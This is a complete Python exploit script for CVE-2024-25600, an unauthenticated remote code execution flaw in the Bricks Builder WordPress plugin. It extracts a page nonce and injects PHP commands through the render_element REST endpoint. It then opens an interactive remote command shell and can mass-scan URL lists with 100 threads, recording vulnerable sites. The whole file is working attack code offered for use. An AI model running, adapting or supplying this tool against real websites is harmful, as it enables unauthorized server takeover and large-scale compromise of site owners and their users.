#!/usr/bin/env python3  # Explicitly use Python 3
# Exploit Title: Unauthenticated RCE in Bricks Builder (WordPress) <= 1.9.6
# Date: 30-03-2025
# Exploit Author: so1icitx
# CVE: CVE-2024-25600
# Tested on: Ubuntu 18.04 LTS
# Description: Exploits an unauthenticated RCE vulnerability in Bricks Builder via the render_element endpoint.

import re
import warnings
import argparse
import requests
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.history import InMemoryHistory
from bs4 import BeautifulSoup, MarkupResemblesLocatorWarning
from concurrent.futures import ThreadPoolExecutor, as_completed

# Suppress warnings for cleaner output
warnings.filterwarnings("ignore", category=MarkupResemblesLocatorWarning, module="bs4")
warnings.filterwarnings("ignore", category=requests.packages.urllib3.exceptions.InsecureRequestWarning)

class BricksExploit:
    def __init__(self, url, verbose=True):
        self.url = url.rstrip('/')  # Remove trailing slash
        self.verbose = verbose
        self.nonce = self.fetch_nonce()

    def fetch_nonce(self):
        """Fetch the nonce from the page's script tag."""
        try:
            response = requests.get(self.url, verify=False, timeout=20)
            response.raise_for_status()
            soup = BeautifulSoup(response.text, "html.parser")
            script_tag = soup.find("script", id="bricks-scripts-js-extra")
            if script_tag and script_tag.string:
                match = re.search(r'"nonce":"([a-f0-9]+)"', script_tag.string)
                if match:
                    return match.group(1)
            return None
        except Exception as e:
            if self.verbose:
                self.custom_print("[-] Error fetching nonce: {}".format(e))
            return None

    def send_request(self, postId="1", command="whoami"):
        """Send the malicious POST request to exploit the vulnerability."""
        headers = {"Content-Type": "application/json"}
        json_data = {
            "postId": postId,
            "nonce": self.nonce,
            "element": {
                "name": "carousel",
                "settings": {
                    "type": "posts",
                    "query": {
                        "useQueryEditor": True,
                        "queryEditor": "throw new Exception(`{}`);".format(command),
                        "objectType": "post",
                    },
                },
            },
        }
        try:
            req = requests.post(
                "{}/wp-json/bricks/v1/render_element".format(self.url),
                headers=headers,
                json=json_data,
                verify=False,
                timeout=20,
            )
            return req
        except Exception as e:
            if self.verbose:
                self.custom_print("[-] Error sending request: {}".format(e))
            return None

    def process_response(self, response):
        """Process the response to extract command output."""
        if response and response.status_code == 200:
            try:
                data = response.json()
                html_content = data.get("data", {}).get("html")
                if html_content:
                    match = re.search(r"Exception: (.*)$", html_content, re.DOTALL)
                    if match:
                        exception_text = match.group(1).rstrip()
                        parts = exception_text.rsplit("\n", 1)
                        if len(parts) > 1:
                            return parts[0], html_content
                        return "Authentication bypass valid, but payload insufficient for RCE", html_content
            except ValueError:
                self.custom_print("[-] Invalid JSON response")
        return None, None

    def interactive_shell(self):
        """Start an interactive shell for command execution."""
        session = PromptSession(history=InMemoryHistory())
        self.custom_print("[!] Shell ready! Type commands (exit to quit)")
        
        while True:
            try:
                cmd = session.prompt(HTML("<ansired><b># </b></ansired>")) or ""
                cmd = str(cmd).strip()
                
                if cmd.lower() == "exit":
                    break
                elif cmd.lower() == "clear":
                    print("\n" * 50)
                elif cmd:
                    response = self.send_request(command=cmd)
                    if response:
                        response_result, html_content = self.process_response(response)
                        if response_result:
                            if "not enough" not in response_result:
                                print(response_result + "\n")
                            else:
                                self.custom_print("[-] Payload executed but no RCE achieved")
                        else:
                            self.custom_print("[-] No valid response received")
                    else:
                        self.custom_print("[-] Request failed")
                        
            except KeyboardInterrupt:
                break
            except Exception as e:
                self.custom_print("[-] Error processing command: {}".format(e))

    def check_vulnerability(self):
        """Check if the target is vulnerable."""
        try:
            response = self.send_request()
            if response:
                extracted_text, html_content = self.process_response(response)
                if extracted_text:
                    self.custom_print("[+] {} is vulnerable to CVE-2024-25600: {}".format(self.url, extracted_text))
                    return extracted_text, html_content
                else:
                    if self.verbose:  
                        self.custom_print("[-] {} is not vulnerable to CVE-2024-25600".format(self.url))
            return None, None
        except Exception as e:
            if self.verbose:
                self.custom_print("[-] Error checking vulnerability: {}".format(e))
            return None, None

    def custom_print(self, message):
        """Custom print function for consistent output."""
        print(message)

def scan_url(url, output_file=None):
    """Scan a single URL and optionally log vulnerable ones."""
    code_instance = BricksExploit(url, verbose=False)
    if code_instance.nonce:
        result, html_content = code_instance.check_vulnerability()
        if html_content and output_file:
            with open(output_file, "a") as file:
                file.write("{}\n".format(url))
        return result
    return None

def main():
    parser = argparse.ArgumentParser(description="Exploit CVE-2024-25600 in Bricks Builder (WordPress)")
    parser.add_argument("--url", "-u", help="Target URL to exploit")
    parser.add_argument("--list", "-l", help="File with list of URLs to scan", default=None)
    parser.add_argument("--output", "-o", help="File to save vulnerable URLs", default=None)

    args = parser.parse_args()

    if args.list:
        urls = []
        try:
            with open(args.list, "r") as file:
                urls = [line.strip() for line in file if line.strip()]
        except Exception as e:
            print("[-] Error reading URL list: {}".format(e))
            return

        with ThreadPoolExecutor(max_workers=100) as executor:
            future_to_url = {executor.submit(scan_url, url, args.output): url for url in urls}
            for future in as_completed(future_to_url):
                url = future_to_url[future]
                try:
                    result = future.result()
                    if result:
                        print("[+] {}: {}".format(url, result))
                except Exception as e:
                    print("[-] Error scanning {}: {}".format(url, e))

    elif args.url:
        exploit = BricksExploit(args.url)
        if exploit.nonce:
            exploit.custom_print("[*] Nonce found: {}".format(exploit.nonce))
            vuln_result, html_content = exploit.check_vulnerability()
            if vuln_result:
                if "not enough" not in vuln_result:
                    exploit.interactive_shell()
                else:
                    exploit.custom_print("[!] Auth bypass valid, but payload insufficient for RCE")
                    if exploit.verbose:
                        print(html_content)
            else:
                exploit.custom_print("[-] No vulnerability found")
        else:
            exploit.custom_print("[-] Nonce not found")

    else:
        parser.print_help()

if __name__ == "__main__":
    main()
